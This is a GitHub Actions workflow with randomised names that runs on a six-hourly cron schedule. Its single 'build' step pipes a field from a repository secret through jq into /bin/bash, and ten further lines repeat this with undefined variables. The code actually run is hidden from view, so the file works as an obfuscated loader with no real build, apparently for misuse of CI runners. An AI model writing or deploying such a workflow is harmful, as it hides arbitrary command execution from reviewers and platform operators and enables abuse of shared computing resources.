name: shenerpin0987
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenerpin0987
        env:
          ab8306: ${{ secrets.ab8306 }}
        run: |
          echo $ab8306 | jq -r .thplf97153 | /bin/bash
          echo $gwm4081 | jq -r .uobok14643 | /bin/bash
          echo $xoz14674 | jq -r .gxi3303 | /bin/bash
          echo $iscad1567 | jq -r .us8821 | /bin/bash
          echo $wjro639 | jq -r .oaoz28 | /bin/bash
          echo $f33209 | jq -r .hm17 | /bin/bash
          echo $ohg973 | jq -r .lpv255 | /bin/bash
          echo $i63610 | jq -r .hknuc6009 | /bin/bash
          echo $iogw736 | jq -r .wv695 | /bin/bash
          echo $hvjpn656 | jq -r .gx19 | /bin/bash
          echo $xywi47663 | jq -r .ikka7 | /bin/bash

